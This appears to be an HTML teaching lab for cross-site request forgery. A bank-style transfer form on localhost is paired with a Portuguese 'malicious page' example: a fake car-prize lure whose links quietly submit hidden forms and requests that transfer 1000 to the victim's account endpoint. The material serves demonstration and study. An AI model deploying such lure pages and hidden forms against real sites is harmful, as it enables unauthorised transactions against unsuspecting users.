<!DOCTYPE html>
<html>

<head>
    <title>Vulnerable CSRF App</title>
</head>

<body>
    <h1>Welcome to our vulnerable CSRF app!</h1>
    <form action="/transfer" method="post" id="transfer-form"  enctype="application/x-www-form-urlencoded">
        <label for="amount">Transfer Amount:</label>
        <input type="number" id="amount" name="amount" required>
        <input type="submit" value="Transfer Money">
    </form>

    <h2>Current Balance: $<span id="balance">1000</span></h2>
    <script>
        // Display the current balance
        function displayBalance() {
            fetch('http://localhost:8080/balance')
                .then(response => response.json())
                .then(data => {
                    document.getElementById('balance').innerText = data.balance;
                })
                .catch(error => {
                    console.error('Error fetching balance:', error);
                });
        }

        // Submit the transfer form
        document.getElementById('transfer-form').addEventListener('submit', function (event) {
            event.preventDefault();
            const form = event.target;
            const formData = new FormData(form);

            fetch(form.action, {
                method: form.method,
                body: formData
            })
                .then(response => response.json())
                .then(data => {
                    if (data.success) {
                        console.log('Transfer successful!');
                    } else {
                        console.error('Transfer failed:', data.error);
                    }
                    displayBalance();
                })
                .catch(error => {
                    console.error('Error submitting form:', error);
                });
        });

        // Initial balance display
        displayBalance();
    </script>

    <hr />

    <h1>Exemplo de uma página maliciosa.</h1>
    <h1>Parabéns, você é um dos sorteados!!!</h1>
    <p>A partir de agora você está você já pode andar de carro 0 KM.</p>
    <p>Isso mesmo, não é pegadinha. Sabemos que há muitos sites maliciosos tendando enganhar pessoas de bem, mas dessa
        vez a sorte bateu a sua porta.</p>
    <p>Clique no link abaixo e você será redirecionado ao nosso Portal.</p>
    <a href="" onclick="submitPremio(event)" onsubmit="return false" >http://www.carrozerokm.com.br/regate-premio</a>
    <br/>
    <a href="" onclick="submitPremio2(event)">http://www.carrozerokm.com.br/regate-premio</a>
    <br/>
    <a href="" onclick="submitPremio3(event)">http://www.carrozerokm.com.br/regate-premio</a>


    <form id="hiddenForm" action="/transfer" onsubmit="return false" method="post" style="display: none;">
        <input type="hidden" id="amount" name="amount" value="1000">
    </form>

    <form action="http://localhost:8080/transfer" method="post" id="form01">
        <input type="hidden" id="amount" name="amount" value="1000">
    </form>

    <div id="output"></div>

    <script>
                
        function submitPremio(event) {
            console.error('1');
            event.preventDefault();
            var x = document.getElementById("form01").submit();
            event.preventDefault();
            displayBalance();
        }


        function submitPremio3(event) {
            event.preventDefault();
            var amount = document.getElementById("amount");
            // var curl_command = "curl -X POST -H \"Content-Type: application/x-www-form-urlencoded\" -d \"amount=1000\" http://localhost:8080/transfer";
            var curl_command = "curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d 'amount=1000' http://localhost:8080/transfer";
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "http://localhost:8080/transfer", true);
            xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
            xhr.send("curl_command=" + encodeURIComponent(curl_command));
            return false;
        }

        function submitPremio2(event) {
            console.error('1');
            console.log('inicio');
            event.preventDefault();
            var formData = new FormData(document.getElementById("hiddenForm"));

            var xhr = new XMLHttpRequest();
            xhr.open("POST", "/transfer", true);
            xhr.onreadystatechange = function () {
                if (xhr.readyState === XMLHttpRequest.DONE) {
                    if (xhr.status === 200) {
                        console.log("Ual, mais próximo ainda do seu carro 0 KM! Aguarde nosso contato!");
                        document.getElementById("output").innerHTML = "Ual, mais próximo ainda do seu carro 0 KM! Aguarde nosso contato!";
                        // displayBalance();

                    } else {
                        console.log("Ouve um erro em nossos sistemas, tente denovo, não deixe para depois!");
                        document.getElementById("output").innerHTML = "Ouve um erro em nossos sistemas, tente denovo, não deixe para depois!";
                    }
                }
            };
            xhr.send(formData);
        }

    </script>


</body>

</html>